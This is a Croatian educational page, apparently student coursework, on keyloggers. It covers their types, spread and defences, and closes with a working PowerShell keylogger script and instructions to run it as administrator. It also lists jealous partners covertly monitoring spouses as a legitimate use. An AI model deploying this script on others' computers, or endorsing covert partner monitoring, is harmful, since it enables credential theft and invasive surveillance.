Powershell Keylogger

Temu rezervirao: Mateo Cindrić

Sadržaj 1 Uvod 2 Općenito o keylogger alatima 2.1 Sklopovski keylogger alati 2.2 Programski keylogger alati 3 Razlozi za korištenje keylogger alata 4 Načini širenja keylogger programa 5 Zaštita od keylogger programa 6 Primjer keylogger programa 7 Literatura

Uvod

Keylogger je naziv za program ili uređaj koji služi za praćenje unosa znakova preko tipkovnice. Ostali nazivi su keystroke logger, key logger te system monitor. Ti alati prate i bilježe tipke koje korisnik pritisne. Takvi alati mogu imati pozitivan učinak na sigurnost računalnog sustava, a mogu se javljati kao dodatak već instaliranim sigurnosnim programima. S druge strane mogu predstavljati veliku sigurnosnu ranjivost za individualni sustav ili cijelu računalnu mrežu. Vrlo je teško zaštititi se od napada keylogger alatima jer je obično nemoguće znati je li takav alat instaliran na ranjivom računalu ili nije.

Općenito o keylogger alatima

Keylogger alati imaju za cilj pratiti unos znakova preko tipkovnice na način da se uključuju u lanac događaja između pritiska tipke na tipkovnici i prikaza znaka na ekranu. To se može postići na više načina među kojima su postavljanje video nadzora, podmetanje prislušnog uređaja na tipkovnicu ili korištenjem samog računala za presretanje unosa znakova, prepisivanjem upravljačkih programa tipkovnice te upravljačkih programa za obavljanje posebnih funkcija tipkovnice, presretanjem DLL (eng. Dynamic-link library) funkcija u korisničkom načinu rada ili presretanjem funkcija jezgre operacijskog sustava. Keylogger alati se dijele u dvije kategorije: sklopovski uređaji i programski paketi. Sklopovski uređaji su male naprave koje se postavljaju u tipkovnicu, žicu od tipkovnice ili u računalo, a programski paketi se sastoje od programa koji prate i bilježe pritiske tipke na tipkovnici.

Sklopovski keylogger alati

Riječ je o uređajima koji se stave između tipkovnice i priključka za tipkovnicu na matičnoj ploči računala. Ovaj način upotrebe keylogger uređaja zahtjeva ugradnju u tajnosti, a to napadaču može predstavljati problem, pošto je teško ugraditi takav uređaj pogotovo u prostoru u kojemu ljudi borave tijekom cijelog dana.

Prednosti:

• Neovisnost o operacijskom sustavu
• Ne može se detektirati antivirusnim programima
• Jednostavna ugradnja bez tehničkog predznanja
• Prati se i bilježi svaki unos znakova preko tipkovnice, uključujući i zaporke za BIOS.

Nedostaci:

• Nema mogućnost zapisa vremena pritiska pojedine tipke
• Mali kapacitet memorije za spremanje podataka
• Potreban pristup sklopovlju računala.

Slika 1 prikazuje uređaj „KeyGhost SX“ sa kapacitetom memorije 2MB. Takav uređaj može pamtiti više od 2 milijuna pritiska tipki na tipkovnici te koristi 128 – bitnu enkripciju pri spremanju podataka.

Programski keylogger alati

Za razliku od sklopovskog uređaja, keylogger kao programski paket za praćenje unosa znakova preko tipkovnice je program koji može pratiti i više od samih pritisaka tipki na tipkovnici. Antivirusnim alatima te drugim programskim alatima za otkrivanje sigurnosnih propusta na računalu je moguće otkriti instaliran keylogger program na operacijskom sustavu.

Prednosti:

• Moguće ga je instalirati s udaljenog računala
• Teško ga je otkriti bez specijalnih programskih alata
• Datoteke za spremanje podataka nemaju ograničen kapacitet memorije
• Datoteke u koje su pohranjeni zapisi pritisaka tipki je moguće preuzeti na više načina: putem e-maila, ftp prijenosa podataka ili putem izravnog preuzimanja s računala na koji je instaliran keylogger program
• Uključuje i dodatne načine praćenja, npr. snimke zaslona računala
• Mogućnost pridruživanja datuma i vremena određenim unosima znakova preko tipkovnice.

Nedostaci:

• Da bi se program mogao instalirati, potrebne su određene ovlasti
• Moguće ga je otkriti pomoću antivirusnih programa i drugih sigurnosnih alata
• Može narušiti rad drugih programa te izazvati neočekivane pogreške
• Prije pokretanja operacijskog sustava ne može pamtiti pritiske tipki što znači da nije moguće zabilježiti korisničko ime ili lozinku za prijavu u sustav
• Za instalaciju programa su potrebni predznanje i vještina
• Potrebno je znati na koji će se operacijski sustav program instalirati jer postoji mogućnost da program neće raditi jer ovisi o operacijskom sustavu.

Nekoliko je načina izrade keylogger programa. Prva metoda je postavljanje tzv. sistemske udice (eng. system hook) koja presreće obavijest o pritisnutoj tipki (Kod Windows operacijskih sustava se koristi WinAPI metoda SetWindowsHook). Iduća metoda je postavljanje cikličkih zahtjeva za informacijama o događajima na tipkovnici (Kod Windows operacijskog sustava se koriste WinAPI metode Get(Async)KeyState ili GetKeyboardState.). Posljednje je korištenje upravljačkih programa za obavljanje posebnih funkcija (za izradu programa je potrebno odlično poznavanje sustava, a program se obično piše u programskom jeziku C).

Više o ovoj temi potražite ovdje

Razlozi za korištenje keylogger alata

Mnogo je programskih paketa kojima administratori mogu pratiti aktivnosti zaposlenika ili pak korisnicima osobnih računala dati mogućnost praćenja aktivnosti udaljenih korisnika njihovih računala. Tanka je linija između opravdanog praćenja i špijuniranja korisnika. Legalni programi se često koriste za krađu povjerljivih korisničkih podataka, obično lozinke. Većina keylogger programa ili uređaja je legalna i mogu se prodavati na slobodnom tržištu.

Slijedi nekoliko primjera gdje je upotreba takvih alata legalna i primjerena:

• Roditeljski nadzor – roditelji mogu pratiti što njihova djeca rade na Internetu, pogotovo pristup web stranica s neprimjerenim sadržajem
• Ljubomorni supružnici ili partneri – mogu pratiti svoje partnere ako ih sumnjiče za virtualno varanje
• Sigurnost tvrtke – ukoliko zaposlenici koriste računalo za vlastite potrebe
• Sigurnost (policija, vojska, zakonodavstvo) – upotreba zapisa za analizu i praćenje incidenata vezanih uz korištenje osobnih računala.

Legalni program se može koristiti i u kriminalne svrhe. Danas se obično keylogger alati i uređaji koriste za krađu korisničkih podataka vezanih uz web sustave za praćenje kreditnih kartica. Mnogi se keylogger programi skrivaju u sustavu te kao takvi imaju rootkit funkcionalnost.

Više o ovoj temi potražite ovdje

Načini širenja keylogger programa

Najčešći načini širenja:

• instalacija prilikom otvaranja datoteke iz privitka email-a
• instalacija prilikom pokretanja datoteke iz direktorija sa slobodnim pristupom preko P2P mreže
• instalacija preko web stranice gdje se iskorištava propust web preglednika te se program automatski pokreće kad korisnik posjeti web stranicu
• instalacija uz pomoć drugih zlonamjernih programa već prisutnih na ranjivom računalu

Zaštita od keylogger programa

Preporuka je instalacija antivirusnog programa budući su većina antivirusnih tvrtki već dodala poznate keylogger programe u svoje baze podataka te se tretiraju kao zlonamjerni programi. Ovo su neke od metoda zaštite od keylogger programa:

• korištenje jednokratnih lozinki ili dvokoračne autentikacije - jednokratne zaporke vrijede samo jedanput te je njihova valjanost vremenski ograničena tako da ako napadač i presretne jednokratnu zaporku, neće ju moći iskoristiti za pristup povjerljivim podacima; većina bankovnih sustava koristi generatore jednokratnih zaporki
• korištenje sustava s proaktivnom zaštitom na klijentskoj strani koji su dizajnirani za otkrivanje keylogger programa te mogu upozoriti korisnika na pokušaje instalacije keylogger programa
• korištenje virtualne tipkovnice - virtualna tipkovnica se prikazuje na zaslonu ekrana, a tipke se pritišću klikovima miša na određene znakove. Naime, virtualne tipkovnice i nisu baš popularne za zaštitu od keylogger programa, već bi ona trebala biti posebno prilagođena sprečavanju presretanja unesenih ili poslanih podataka. Na Windows 7 se nalazi na sljedećem mjestu: Start > All Programs > Accessories > Ease of Access > On-Screen Keyboard.

Više o ovoj temi potražite ovdje

Primjer keylogger programa

Programski kod napisan u nastavku predstavlja keylogger program koji je napisan u PowerShellu. Osnovi zadatak mu je pamćenje unosa znakova s tipkovnice, odnosno pritiska alfanumeričkih i specijalnih znakova na tipkovnici. Program može pamtiti velika i mala slova, brojeve, dijakritičke znakove (č, ć, ž, š i đ), znak razmaka te sve pravopisne znakove. Unesene znakove pohranjuje u horizontalnom obliku u datoteku koju sam nazvao PowerShellKeylogger.txt. Od nabrojanih metoda izrade keylogger programa u poglavlju 2.2, ovaj keylogger koristi metodu koja postavlja cikličke zahtjeve za informacijama o događajima na tipkovnici, a budući da je riječ o Windows operacijskom sustavu, koriste se WinAPI metode Get(Async)KeyState te GetKeyboardState.

function PowerShellKeylogger($Path="$env:C\PowerShellKeylogger.txt")
{

    $virtualKeyCodeSignature = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
    $keyboardStateSignature = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
    $mapSignature = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
	$unicodeSignature = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  $getState = Add-Type -MemberDefinition $virtualKeyCodeSignature -name "Win32GetState" -namespace Win32Functions -passThru
  $getKeyboardState = Add-Type -MemberDefinition $keyboardStateSignature -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  $getMapVirtualKey = Add-Type -MemberDefinition $mapSignature -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  $getUnicode = Add-Type -MemberDefinition $unicodeSignature -name "Win32MyToUnicode" -namespace Win32Functions -passThru
 
  $outputFile = New-Item -Path $Path -ItemType File -Force
 
  try
  {
 
    while ($true) {
      Start-Sleep -Milliseconds 10
      
      for ($asciiCode = 1; $asciiCode -le 254; $asciiCode++) {
        $keyState = $getState::GetAsyncKeyState($asciiCode)
 
        if ($keyState -eq -32767) {
          $capsLock = [console]::CapsLock
 
          $virtualKey = $getMapVirtualKey::MapVirtualKey($asciiCode, 3)
 
          $kbState = New-Object Byte[] 256
          $checkkbState = $getKeyboardState::GetKeyboardState($kbState)
 
          $myChar = New-Object -TypeName "System.Text.StringBuilder";
 
          $result = $getUnicode::ToUnicode($asciiCode, $virtualKey, $kbState, $myChar, $myChar.Capacity, 0)
 
          if ($result -gt 0)
          {
            [System.IO.File]::AppendAllText($Path, $myChar, [System.Text.Encoding]::Unicode)
          }
        }
      }
    }
  }
  finally
  {
    notepad $Path
  }
}
 
PowerShellKeylogger

Nekoliko je načina pokretanja ovog programskog koda:

1. način –cmd

Za pokretanje programa putem cmd-a potrebno je pohraniti datoteku s kodom (ekstenzija .ps1) na računalo. Otvorite cmd kao administrator te prvo promijenite politiku izvršavanja na

powershell Set-ExecutionPolicy RemoteSigned

Potom u command promptu doći do putanje gdje je datoteka spremljena te ju pokrenuti:

powershell.exe -file naziv_datoteke.ps1

2. način – Windows PowerShell ili Windows PowerShell ISE

• 1.Korak

Otvoriti Windows PowerShell (otvoriti program kao administrator)

• 2.Korak

Nakon što ste otvorili Windows PowerShell kao administrator, promijenite politiku izvršavanja unošenjem sljedeće linije:

Set-ExecutionPolicy RemoteSigned

• 3.Korak

Kopirati kod i zalijepiti ga u Windows PowerShell.

Sada Windows PowerShell izgleda ovako:

• 4.Korak

Otvoriti neku aplikaciju (npr. web browser) te pritisnuti tipke na tipkovnici

• 5.Korak

Po završetku, pritisnite CTRL+C kako bi se zaustavilo izvršavanje koda.

• 6.Korak

Tada će se kao rezultat otvoriti datoteka u notepad-u koja ostaje pohranjena na putanji C\PowerShellKeylogger.txt

• 7.Korak

Kao alternativu, možete otvoriti Windows PowerShell ISE te u njemu otvoriti datoteku ili kopirati kod na predviđeno mjesto. Zatim pritisnite Play ikonu kako bi pokrenuli skriptu. Ovakav način pokretanja će dati isti krajnji rezultat.

Literatura

1. CARNet CERT: Praćenje unosa znakova preko tipkovnice http://www.cis.hr/www.edicija/LinkedDocuments/CCERT-PUBDOC-2007-11-211.pdf
2. Creating a Simple Keylogger using PowerShell https://www.nextofwindows.com/creating-a-simple-keylogger-using-powershell-download
3. Simple Keylogger with Powershell https://www.youtube.com/watch?v=LsXQPZfvksg
4. How to create a simple keylogger yourself in windows http://merabheja.com/create-simple-keylogger-windows/
5. Simple Windows Keylogger using PowerShell https://gist.github.com/dasgoll/7ca1c059dd3b3fbc7277
6. First version of powershell keylogger https://github.com/vacmf/powershell-scripts/blob/master/powershell-keylogger.ps1
7. Powershell Keylogger https://0x00sec.org/t/plug-in-to-win-powershell-keylogger-part-2-3/1158
8. Comparison Operators http://ss64.com/ps/syntax-compare.html
9. Slika 1. http://www.keyghost.com/sx/images/closeup_sx.gif
10. Slika 2. http://merabheja.com/create-simple-keylogger-windows/